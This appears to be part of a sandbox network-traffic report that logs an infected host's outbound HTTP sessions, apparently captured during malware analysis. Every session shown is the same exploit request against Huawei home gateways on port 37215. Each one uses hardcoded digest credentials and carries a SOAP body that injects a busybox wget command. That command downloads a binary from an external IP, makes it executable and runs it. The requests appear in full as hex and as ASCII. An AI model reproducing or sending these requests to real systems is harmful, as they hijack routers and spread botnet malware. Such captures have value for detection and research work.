                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              513192.168.2.154676837.89.164.3537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720659018 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              514192.168.2.155312245.191.149.6037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720681906 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              515192.168.2.154691641.39.104.1537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720681906 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              516192.168.2.1535014190.132.33.15037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720694065 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              517192.168.2.1534038186.175.210.4637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720715046 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              518192.168.2.1544008190.210.89.8037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720731974 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              519192.168.2.1541578197.26.217.12937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720752001 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              520192.168.2.155876237.85.126.437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720760107 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              521192.168.2.154769894.26.38.20237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720788956 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              522192.168.2.1538286102.246.126.8737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720788956 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
